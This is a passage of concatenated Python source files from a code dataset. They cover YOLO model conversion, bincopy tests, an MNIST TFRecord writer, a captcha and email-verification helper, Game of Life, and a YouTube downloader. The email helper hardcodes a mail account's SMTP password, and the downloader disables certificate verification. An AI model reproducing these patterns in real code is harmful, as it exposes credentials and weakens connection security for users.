\"+str(R[k])+\"\\n\")\nf.close()\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_noelnadal_16QRB.py","file_name":"16_0_2_noelnadal_16QRB.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368513701","text":"import torch\nfrom nets.yolo4_tiny import YoloBody\nimport numpy as np\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ntorch_model = torch.load(\"traffic.pt\",map_location=device) # pytorch模型加载\ntorch_model2 = torch.load(\"../logs/Epoch100-Total_Loss5.2986-Val_Loss8.4492.pth\",map_location=device) # pytorch模型加载\n\nprint(\"module_list_len:\",len(torch_model['model']))\nprint(\"module_list2_len:\",len(torch_model2))\nnew_state_dict = {}\nfor layer_name,layer_name2 in zip(torch_model['model'],torch_model2):\n print(layer_name,np.shape(torch_model['model'][layer_name]),\"\\t\",layer_name2,np.shape(torch_model2[layer_name2]))\n new_state_dict[layer_name2]=torch_model['model'][layer_name]\n\n# print(\"--\"*100)\nmodel = YoloBody(3,1).eval()\nprint(model)\nmodel.load_state_dict(new_state_dict)\n\n# print(model.backbone.conv1.conv.weight,type(model.backbone.conv1.conv.weight))\n\n# batch_size = 1 #批处理大小\n# input_shape = (3, 416, 416) #输入数据,改成自己的输入shape\n\n# #set the model to inference mode\n# model.eval()\n\n# x = torch.randn(batch_size, *input_shape)\t# 生成张量\n# export_onnx_file = \"../model_data/yolov4_tiny_weights_coco2.onnx\"\t\t\t# 目的ONNX文件名\n# torch.onnx.export(model,\n# x,\n# export_onnx_file,\n# opset_version=11,\n# do_constant_folding=True,\t# 是否执行常量折叠优化\n# input_names=[\"input\"],\t# 输入名\n# output_names=[\"output\"],\t# 输出名\n# dynamic_axes={\"input\":{0:\"batch_size\"}, # 批处理变量\n# \"output\":{0:\"batch_size\"}})","sub_path":"ONNX_file/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"39663765","text":"import pyne\nfrom xdress.typesystem import TypeSystem\n\npackage = 'bright'\nsourcedir = 'cpp'\npackagedir = 'bright'\n\nincludes = [pyne.includes]\n\nextra_types = 'pyne.extra_types' # non-default value\nmake_extra_types = False\n\nstlcontainers = []\nmake_stlcontainers = False\nstlcontainers_module = 'pyne.stlcontainers'\n\nclasses = [\n # classname, source filename[, bindings filename]\n ('FCComp', 'fccomp'),\n ('EnrichmentParameters', 'enrichment_parameters'),\n ('Enrichment', 'bright_enrichment', 'enrichment'),\n ('Reprocess', 'reprocess'),\n ('decay_nuc', 'storage'),\n ('from_nuc_struct', 'storage', None),\n ('Storage', 'storage'),\n ('FluencePoint', 'fluence_point'),\n ('ReactorParameters', 'reactor_parameters'),\n ('Reactor1G', 'reactor1g'),\n ('LightWaterReactor1G', 'light_water_reactor1g'),\n ('FastReactor1G', 'fast_reactor1g'),\n ('FuelFabrication', 'fuel_fabrication'),\n ('ReactorMG', 'reactormg'),\n ]\n\nfunctions = []\n\nts = TypeSystem.empty()\n\n# hack in some material registrations\nts.register_class('Material', \n cython_c_type='cpp_material.Material', cython_cimport=('pyne', 'cpp_material'),\n cython_cy_type='material._Material', cython_py_type='material.Material', \n cython_template_class_name='Material', cython_cyimport=('pyne', 'material'),\n cython_pyimport=('pyne', 'material'), \n cython_c2py=('{pytype}({var})',\n ('{proxy_name} = {pytype}()\\n'\n '{proxy_name}.mat_pointer[0] = {var}'),\n ('if {cache_name} is None:\\n'\n ' {proxy_name} = {pytype}(free_mat=False)\\n'\n ' {proxy_name}.mat_pointer = &{var}\\n'\n ' {cache_name} = {proxy_name}\\n')),\n cython_py2c=(\n '{proxy_name} = {pytype}({var}, free_mat=not isinstance({var}, {cytype}))',\n '{proxy_name}.mat_pointer[0]'),\n )\n\n#ts.register_specialization(('map', 'str', ('Material', '*'), 0),\n# cython_c_type='material._MapStrMaterial',\n# cython_cy_type='material._MapStrMaterial',\n# cython_py_type='material.MapStrMaterial',\n# cython_cimport=(('pyne', 'material'),),\n# cython_cyimport=(('pyne', 'material'),),\n# cython_pyimport=(('pyne', 'material'),),\n# )\n","sub_path":"xdressrc.py","file_name":"xdressrc.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"251221787","text":"import clase as cl\nimport curso as cr\nimport profesor as pr\nimport os\nimport django\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'viperEAFIT.settings'\ndjango.setup()\n\nfrom schedules.models import Schedule\nfrom academics.models import Class, Course\n\n\nclass Escuela:\n def __init__(self, name, max_score=0):\n self.max_score = max_score\n self.name = name\n self.clases = {cla:cla.id for cla in Class.objects.all()}\n self.cursos = {course:course.id for course in Course.objects.all()}\n null_prof = pr.Profesor(\"nocand\")\n null_prof.set_var(\"nocand\", -1000)\n self.profs = {\"nocand\": null_prof}\n\n\n def print_info(self):\n print(\"there are\", len(self.cursos), \"courses\")\n print(\"there are\", len(self.clases), \"clases\")\n print(\"there are\", len(self.profs), \"profs\")\n avg_avail = 0\n avg_occ = 0\n avg_max = 0\n for prof in self.profs.values():\n avg_avail += prof.get_horario().count_avail()\n avg_occ += prof.get_horario().get_total_h()\n avg_max += prof.get_mhor()\n\n\n print(\"avg avail is\", avg_avail/len(self.profs))\n print(\"avg occupied is\", avg_occ/len(self.profs))\n print(\"avg max is\", avg_max/len(self.profs))\n\n cands = [len(x.get_cands()) for x in self.clases.values()]\n print(\"avg num of cands is\", sum(cands)/len(cands), \"\\n\")\n\n \n def get_profs(self):\n return self.profs\n\n\n def get_prof(self, profid):\n val = self.profs.get(profid)\n if val == None:\n print(profid)\n print(self.profs)\n return val\n\n\n def add_prof(self, prof):\n self.profs[prof.get_id()] = prof\n\n\n def get_clases(self):\n return self.clases\n\n\n def get_clase(self, claseid):\n return self.clases.get(claseid)\n\n\n def add_clase(self, clase):\n self.clases[clase.get_id()] = clase\n\n\n def get_cursos(self):\n return self.cursos\n\n\n def get_curso(self, cursoid):\n return self.cursos.get(cursoid)\n\n\n def add_curso(self, curso):\n self.cursos[curso.get_id()] = curso\n \n\n# esc = Escuela('Escuelita')\n# print(esc.clases)\n# print(esc.cursos)","sub_path":"escuela.py","file_name":"escuela.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"431177455","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\nimport re\nimport pafy # https://github.com/mps-youtube/pafy\nimport os\nfrom pprint import pprint\nimport threading\n\nDESKTOP_FOLDER = os.path.join(os.path.expanduser('~'), 'Desktop') # Should work on Mac, Windows & Linux\n\nclass YoutubeDownloaderApp():\n def __init__(self, parent):\n # Create the window\n self.window = parent\n self.window.geometry(\"450x300\")\n self.window.title(\"Youtube Downloader\")\n self.video = True\n self.downloading = False\n\n self.question_label = tk.Label(self.window, text=\"Youtube URL of video to download\")\n self.question_label.place(x=20, y=20)\n\n self.url_entry = tk.Entry(self.window)\n self.url_entry.place(x=20, y=60, w=300)\n self.url_entry.focus()\n\n self.question2_label = tk.Label(self.window, text=\"Save to folder\")\n self.question2_label.place(x=20, y=100)\n\n self.target_folder_entry = tk.Entry(self.window)\n self.target_folder_entry.place(x=20,y=140, w=300)\n self.target_folder_entry.delete(0, tk.END)\n self.target_folder_entry.insert(tk.END, DESKTOP_FOLDER)\n self.pick_folder_button = tk.Button(self.window, text=\"Select folder\", command=self.get_folder)\n self.pick_folder_button.place(x=350, y=140)\n\n self.get_video_button = tk.Button(self.window, text=\"Start download\", command=self.start_download)\n self.get_video_button.place(x=200, y=190)\n self.mode_button = tk.Button(self.window, text=\"Switch to M4A (audio) mode\", command=self.switch_mode)\n self.mode_button.place(x=20, y=190)\n self.close_button = tk.Button(self.window, text=\"Close\", command=self.window.quit)\n self.close_button.place(x=350, y=190)\n\n self.progress=ttk.Progressbar(self.window,orient=tk.HORIZONTAL,length=100,mode='determinate')\n self.progress.place(x=20, y=230)\n self.info = tk.Label(self.window, text=\"\")\n self.info.place(x=20,y=270)\n\n def switch_mode(self):\n self.video = not self.video\n if self.video:\n self.mode_button.configure(text=\"Switch to M4A (audio) mode\")\n else:\n self.mode_button.configure(text=\"Switch to MP4 (video) mode\")\n\n def start_download(self):\n url = self.url_entry.get()\n folder = self.target_folder_entry.get()\n if not self.downloading:\n threading.Thread(target=self.download_youtube).start()\n \n def get_folder(self):\n folder = filedialog.askdirectory(initialdir=DESKTOP_FOLDER, title = \"Select folder to save to\")\n self.target_folder_entry.delete(0, tk.END)\n self.target_folder_entry.insert(tk.END, folder)\n\n def _clean_file_name( self, original ):\n # Strip non-filename-friendly characters from the filename\n regex = re.compile('[^a-zA-Z0-9 \\-.]')\n return regex.sub(\"\", original )\n\n def download_youtube(self):\n self.downloading = True\n mode = \"video\" if self.video else \"audio\"\n url = self.url_entry.get()\n folder = self.target_folder_entry.get()\n video = pafy.new(url, ydl_opts={'nocheckcertificate': True, \"--no-check-certificate\": True})\n if mode == \"video\":\n best = video.getbestvideo(preftype=\"mp4\")\n else:\n best = video.getbestaudio(preftype=\"m4a\")\n saveAs = self._clean_file_name(video.title+\".\"+best.extension)\n saveAs = os.path.join(folder, saveAs)\n best.download(quiet=True, filepath=saveAs, callback=self.update_status)\n messagebox.showinfo(\"Done\", f\"Video \\n{url}\\n saved to\\n{saveAs}\")\n self.downloading = False\n return saveAs\n\n\n def update_status(self, stream, downloaded, ratio, rate, eta):\n percent = int(ratio*100)\n self.progress['value'] = percent\n mb = 1024*1024\n info_str = f\"{downloaded//mb} of {stream//mb} MB downloaded. {int(eta)} seconds remaining.\"\n self.info.configure(text=info_str)\n pass\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = YoutubeDownloaderApp(root)\n root.mainloop()\n\n\n# https://www.youtube.com/watch?v=Ug5IOh6PxWQ","sub_path":"youtube-downloader.py","file_name":"youtube-downloader.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"223009134","text":"import gzip\r\nimport json\r\nimport leveldb\r\n\r\n\r\ndef main():\r\n db = leveldb.LevelDB('knock60') # dbを指定、なかったら自動で作成\r\n with gzip.open('artist.json.gz', \"rt\", \"utf_8\") as f:\r\n for line in f:\r\n json_data = json.loads(line) # jsonデータを辞書型に変換\r\n name = f\"{json_data['name']}_{json_data['id']}\" # nameが同じ場合があるためidを付ける\r\n if 'area' in json_data:\r\n area = json_data['area']\r\n else:\r\n area = ''\r\n\r\n # str.encode()で文字列からバイト列に変換\r\n db.Put(name.encode(), area.encode())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"hwichan/chapter07/knock60.py","file_name":"knock60.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"346035739","text":"from __future__ import print_function\n\nimport unittest\nimport bincopy\n\nclass BinCopyTest(unittest.TestCase):\n\n def test_srec(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/in.s19') as fin:\n self.assertEqual(binfile.as_srec(28, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/empty_main.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(padding=b'\\x00'), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_srec_file('tests/files/empty_main_rearranged.s19')\n with open('tests/files/empty_main.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(padding=b'\\x00'), fin.read())\n\n try:\n binfile.add_srec_file('tests/files/bad_crc.s19')\n self.fail()\n except bincopy.Error as e:\n print(e)\n\n def test_ihex(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/in.hex') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_ihex_file('tests/files/in.hex')\n with open('tests/files/in.hex') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n def test_binary(self):\n # Add data to 0..2.\n binfile = bincopy.BinFile()\n with open('tests/files/binary1.bin', 'rb') as fin:\n binfile.add_binary(fin.read())\n with open('tests/files/binary1.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(), fin.read())\n\n # Add data to 15..179.\n binfile = bincopy.BinFile()\n binfile.add_binary_file('tests/files/binary2.bin', 15)\n try:\n # cannot add overlapping segments\n with open('tests/files/binary2.bin', 'rb') as fin:\n binfile.add_binary(fin.read(), 20)\n self.fail()\n except bincopy.Error as err:\n print(err)\n # exclude the overlapping part and add\n binfile.exclude(20, 1024)\n with open('tests/files/binary2.bin', 'rb') as fin:\n binfile.add_binary(fin.read(), 20)\n with open('tests/files/binary3.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(minimum_address=0,\n padding=b'\\x00'), fin.read())\n\n def test_array(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/in.i') as fin:\n self.assertEqual(binfile.as_array() + '\\n', fin.read())\n\n def test_hexdump(self):\n binfile = bincopy.BinFile()\n binfile.add_binary(b'12',address=17)\n binfile.add_binary(b'34', address=26)\n binfile.add_binary(b'5678', address=30)\n binfile.add_binary(b'9', address=47)\n with open('tests/files/hexdump.txt') as fin:\n self.assertEqual(binfile.as_hexdump(), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_binary(b'34', address=0x150)\n binfile.add_binary(b'3', address=0x163)\n binfile.add_binary(b'\\x01', address=0x260)\n binfile.add_binary(b'3', address=0x263)\n with open('tests/files/hexdump2.txt') as fin:\n self.assertEqual(binfile.as_hexdump(), fin.read())\n\n def test_srec_ihex_binary(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/binary1.bin', 'rb') as fin:\n binfile.add_binary(fin.read(), 1024)\n with open('tests/files/out.hex', 'r') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n with open('tests/files/out.s19') as fin:\n self.assertEqual(binfile.as_srec(address_length_bits=16), fin.read())\n binfile.fill(b'\\x00')\n with open('tests/files/out.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(), fin.read())\n\n def test_exclude_crop(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(2, 4)\n with open('tests/files/in_exclude_2_4.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(3, 1024)\n with open('tests/files/in_exclude_3_1024.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(0, 9)\n with open('tests/files/in_exclude_0_9.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(0x400240, 0x400600)\n with open('tests/files/empty_main_mod.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(padding=b'\\x00'), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_srec_file('tests/files/in.s19')\n binfile.crop(2, 4)\n with open('tests/files/in_crop_2_4.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n binfile.exclude(2, 4)\n self.assertEqual(binfile.as_binary(), b'')\n\n def test_minimum_maximum(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n self.assertEqual(binfile.get_minimum_address(), 0)\n self.assertEqual(binfile.get_maximum_address(), 70)\n\n def test_iter_segments(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n i = 0\n for begin, end, data in binfile.iter_segments():\n del begin, end, data\n i += 1\n self.assertEqual(i, 1)\n\n def test_add_files(self):\n binfile = bincopy.BinFile()\n binfile_1_2 = bincopy.BinFile()\n binfile.add_binary(b'\\x00')\n binfile_1_2.add_binary(b'\\x01', address=1)\n binfile += binfile_1_2\n self.assertEqual(binfile.as_binary(), b'\\x00\\x01')\n\n def test_info(self):\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n self.assertEqual(binfile.info(), \"\"\"header: \"bincopy/empty_main.s19\"\nexecution start address: 0x00400400\ndata:\n 0x00400238 - 0x004002b4\n 0x004002b8 - 0x0040033e\n 0x00400340 - 0x004003c2\n 0x004003d0 - 0x00400572\n 0x00400574 - 0x0040057d\n 0x00400580 - 0x004006ac\n 0x00600e10 - 0x00601038\n\"\"\")\n\n def test_ihex_crc(self):\n self.assertEqual(bincopy.crc_ihex('0300300002337a'), 0x1e)\n self.assertEqual(bincopy.crc_ihex('00000000'), 0)\n\n def test_word_size(self):\n binfile = bincopy.BinFile(word_size_bits=16)\n with open('tests/files/in_16bits_word.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/out_16bits_word.s19') as fin:\n self.assertEqual(binfile.as_srec(30, 24), fin.read())\n\n def test_print(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n print(binfile)\n\n def test_issue_4_1(self):\n binfile = bincopy.BinFile()\n with open('tests/files/issue_4_in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/issue_4_out.hex', 'r') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n def test_issue_4_2(self):\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/empty_main.hex', 'r') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n def test_performance(self):\n binfile = bincopy.BinFile()\n\n # Add a 1MB consecutive binary.\n chunk = 1024 * b\"1\"\n for i in range(1024):\n binfile.add_binary(chunk, 1024 * i)\n\n self.assertEqual(binfile.get_minimum_address(), 0)\n self.assertEqual(binfile.get_maximum_address(), 1024 * 1024)\n\n ihex = binfile.as_ihex()\n srec = binfile.as_srec()\n\n binfile = bincopy.BinFile()\n binfile.add_ihex(ihex)\n\n binfile = bincopy.BinFile()\n binfile.add_srec(srec)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_bincopy.py","file_name":"test_bincopy.py","file_ext":"py","file_size_in_byte":9165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"351268840","text":"# Copyright 2018 The CapsLayer Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==========================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom capslayer.data.utils.TFRecordHelper import int64_feature, bytes_feature\n\n\nMNIST_FILES = {\n 'train': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'eval': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'test': ('t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte')\n}\n\n\ndef load_mnist(path, split):\n split = split.lower()\n image_file, label_file = [os.path.join(path, file_name) for file_name in MNIST_FILES[split]]\n\n with open(image_file) as fd:\n images = np.fromfile(file=fd, dtype=np.uint8)\n images = images[16:].reshape(-1, 784).astype(np.float32)\n if split == \"train\":\n images = images[:55000]\n elif split == \"eval\":\n images = images[55000:]\n with open(label_file) as fd:\n labels = np.fromfile(file=fd, dtype=np.uint8)\n labels = labels[8:].astype(np.int32)\n if split == \"train\":\n labels = labels[:55000]\n elif split == \"eval\":\n labels = labels[55000:]\n return(zip(images, labels))\n\n\ndef encode_and_write(dataset, filename):\n with tf.python_io.TFRecordWriter(filename) as writer:\n for image, label in dataset:\n image_raw = image.tostring()\n example = tf.train.Example(features=tf.train.Features(\n feature={'image': bytes_feature(image_raw),\n 'label': int64_feature(label),\n 'height': int64_feature(28),\n 'width': int64_feature(28),\n 'depth': int64_feature(1)}))\n writer.write(example.SerializeToString())\n\n\ndef tfrecord_runner(path, force=True):\n train_set = load_mnist(path, 'train')\n eval_set = load_mnist(path, 'eval')\n test_set = load_mnist(path, 'test')\n\n train_set_outpath = os.path.join(path, \"train_mnist.tfrecord\")\n eval_set_outpath = os.path.join(path, \"eval_mnist.tfrecord\")\n test_set_outpath = os.path.join(path, \"test_mnist.tfrecord\")\n\n if not os.path.exists(train_set_outpath) or force:\n encode_and_write(train_set, train_set_outpath)\n if not os.path.exists(eval_set_outpath) or force:\n encode_and_write(eval_set, eval_set_outpath)\n if not os.path.exists(test_set_outpath) or force:\n encode_and_write(test_set, test_set_outpath)\n\n\nif __name__ == '__main__':\n path = \"models/data/mnist\"\n tfrecord_runner(path)\n","sub_path":"capslayer/data/datasets/mnist/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586366000","text":"import random, string, time\nfrom datetime import datetime\nfrom io import BytesIO\nfrom PIL import Image, ImageFont, ImageDraw\n\nclass ImageCode:\n def rand_color(self):\n red = random.randint(32, 200)\n green = random.randint(22, 255)\n blue = random.randint(0, 200)\n return red, green, blue\n\n def gen_text(self):\n list = random.sample(string.ascii_letters+string.digits, 4)\n return ''.join(list)\n\n def draw_lines(self, draw, num, width, height):\n for num in range(num):\n x1 = random.randint(0, width / 2)\n y1 = random.randint(0, height / 2)\n x2 = random.randint(0, width)\n y2 = random.randint(height / 2, height)\n draw.line(((x1, y1), (x2, y2)), fill='black', width=2)\n\n def draw_verify_code(self):\n code = self.gen_text()\n width, height = 120, 50\n im = Image.new('RGB', (width, height), 'white')\n font = ImageFont.truetype(font='arial.ttf', size=40)\n draw = ImageDraw.Draw(im)\n for i in range(4):\n draw.text((5 + random.randint(-3, 3) + 23 * i, 5 + random.randint(-3, 3)),\n text=code[i], fill=self.rand_color(), font=font)\n self.draw_lines(draw, 4, width, height)\n return im, code\n\n def get_code(self):\n image, code = self.draw_verify_code()\n buf = BytesIO()\n image.save(buf, 'jpeg')\n bstring = buf.getvalue()\n return code, bstring\n\nfrom smtplib import SMTP_SSL\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\ndef send_email(receiver, ecode):\n sender = 'Blog <15903523@qq.com>'\n content = f\"
Welcome to register blog system account, your email verification code is:\" \\\n f\"{ecode},\" \\\n f\"Please copy to the registration window to complete the registration. Thank you for joining our wewrite community.
\"\n message = MIMEText(content, 'html', 'utf-8')\n message['Subject'] = Header('Wewrite registration verification code', 'utf-8')\n message['From'] = sender\n message['To'] = receiver\n\n smtpObj = SMTP_SSL('smtp.qq.com')\n smtpObj.login(user='15903523@qq.com', password='uczmmmqvpxwjbjaf')\n smtpObj.sendmail(sender, receiver, str(message))\n smtpObj.quit()\n\ndef gen_email_code():\n str = random.sample(string.ascii_letters + string.digits, 6)\n return ''.join(str)\n\ndef model_list(result):\n list = []\n for row in result:\n dict = {}\n for k, v in row.__dict__.items():\n if not k.startswith('_sa_instance_state'):\n if isinstance(v, datetime):\n v = v.strftime('%Y-%m-%d %H:%M:%S')\n dict[k] = v\n list.append(dict)\n\n return list\n\ndef model_join_list(result):\n list = [] \n for obj1, obj2 in result:\n dict = {}\n for k1, v1 in obj1.__dict__.items():\n if not k1.startswith('_sa_instance_state'):\n if not k1 in dict: \n dict[k1] = v1\n for k2, v2 in obj2.__dict__.items():\n if not k2.startswith('_sa_instance_state'):\n if not k2 in dict: \n dict[k2] = v2\n list.append(dict)\n return list\n\ndef compress_image(source, dest, width):\n from PIL import Image\n im = Image.open(source)\n x, y = im.size \n if x > width:\n ys = int(y * width / x)\n xs = width\n temp = im.resize((xs, ys), Image.ANTIALIAS)\n temp.save(dest, quality=80)\n else:\n im.save(dest, quality=80)\n\ndef parse_image_url(content):\n import re\n temp_list = re.findall('= 0):\r\n if(matrix[i-1][j]):\r\n alive+=1\r\n # North West\r\n if(j-1 >= 0):\r\n if(matrix[i-1][j-1]):\r\n alive+=1\r\n # North East\r\n if(j+1 < len(matrix)):\r\n if(matrix[i-1][j+1]):\r\n alive+=1\r\n # South\r\n if(i+1 < len(matrix)):\r\n if(matrix[i+1][j]):\r\n alive+=1\r\n # South West\r\n if(j-1 >= 0):\r\n if(matrix[i+1][j-1]):\r\n alive+=1\r\n # South East\r\n if(j+1 < len(matrix)):\r\n if(matrix[i+1][j+1]):\r\n alive+=1\r\n # East\r\n if(j+1 < len(matrix)):\r\n if(matrix[i][j+1]):\r\n alive+=1\r\n # West\r\n if(j-1 >= 0):\r\n if(matrix[i][j-1]):\r\n alive+=1\r\n\r\n return alive\r\n \r\n# Helper function, checks if current live cell should stay alive or die\r\n# n - number of alive neighbors, tmp - tmp_matrix\r\ndef live_cell(n, tmp, i, j):\r\n if(n <= 1 or n >= 4):\r\n # live cell dies\r\n tmp[i][j] = 0\r\n\r\n# Helper function , checks if current dead cell should stay dead or come alive\r\n# n - number of alive neighbors, tmp - tmp_matrix\r\ndef dead_cell(n, tmp, i, j):\r\n if(n == 3):\r\n # dead cell lives\r\n tmp[i][j] = 1\r\n\r\n# Generates 2D matrix\r\ndef gen_matrix(n): \r\n matrix = [[np.random.randint(2) for i in range(n)] for j in range(n)]\r\n return matrix\r\n\r\n# Prints the matrix row by row\r\ndef print_matrix(matrix):\r\n for row in matrix:\r\n print(row)\r\n\r\n# Main method\r\ndef main():\r\n n, l = int(sys.argv[1]), int(sys.argv[2])\r\n matrix = gen_matrix(n)\r\n print(\"Initial Neighbors...\")\r\n print_matrix(matrix)\r\n print('\\n')\r\n\r\n # The magic happens here\r\n generate(matrix, l)\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"359634165","text":"# Boa:Frame:Frame1\n\nimport os\nimport sys\nimport time\nimport threading\nimport datetime\nimport json\nimport traceback\nimport io\n\nimport wx\nfrom wx.adv import TaskBarIcon as wxTaskBarIcon\nfrom wx.adv import EVT_TASKBAR_LEFT_DCLICK\n\nimport pyWinhook\nimport win32con\nimport win32api\nimport ctypes\nimport pyperclip\n\nVERSION = '1.0.0'\n\nwx.NO_3D = 0\nHOT_KEYS = ['F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'F10', 'F11', 'F12']\n\n\ndef GetMondrianStream():\n data = b'\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00 \\x00\\x00\\x00 \\x08\\x06\\x00\\x00\\x00szz\\xf4\\x00\\x00\\x00\\x04sBIT\\x08\\x08\\x08\\x08|\\x08d\\x88\\x00\\x00\\x00qIDATX\\x85\\xed\\xd6;\\n\\x800\\x10E\\xd1{\\xc5\\x8d\\xb9r\\x97\\x16\\x0b\\xad$\\x8a\\x82:\\x16o\\xda\\x84pB2\\x1f\\x81Fa\\x8c\\x9c\\x08\\x04Z{\\xcf\\xa72\\xbcv\\xfa\\xc5\\x08 \\x80r\\x80\\xfc\\xa2\\x0e\\x1c\\xe4\\xba\\xfaX\\x1d\\xd0\\xde]S\\x07\\x02\\xd8>\\xe1wa-`\\x9fQ\\xe9\\x86\\x01\\x04\\x10\\x00\\\\(Dk\\x1b-\\x04\\xdc\\x1d\\x07\\x14\\x98;\\x0bS\\x7f\\x7f\\xf9\\x13\\x04\\x10@\\xf9X\\xbe\\x00\\xc9 \\x14K\\xc1<={\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n stream = io.BytesIO(data)\n return stream\n\n\ndef GetMondrianBitmap():\n stream = GetMondrianStream()\n image = wx.Image(stream)\n return wx.Bitmap(image)\n\n\ndef GetMondrianIcon():\n icon = wx.Icon()\n icon.CopyFromBitmap(GetMondrianBitmap())\n return icon\n\n\ndef create(parent):\n return Frame1(parent)\n\n\ndef current_ts():\n return int(time.time() * 1000)\n\n\n[wxID_FRAME1, wxID_FRAME1BTRECORD, wxID_FRAME1BTRUN, wxID_FRAME1BTPAUSE, wxID_FRAME1BUTTON1,\n wxID_FRAME1CHOICE_SCRIPT, wxID_FRAME1CHOICE_START, wxID_FRAME1CHOICE_STOP,\n wxID_FRAME1PANEL1, wxID_FRAME1STATICTEXT1, wxID_FRAME1STATICTEXT2,\n wxID_FRAME1STATICTEXT3, wxID_FRAME1STATICTEXT4, wxID_FRAME1STIMES,\n wxID_FRAME1TEXTCTRL1, 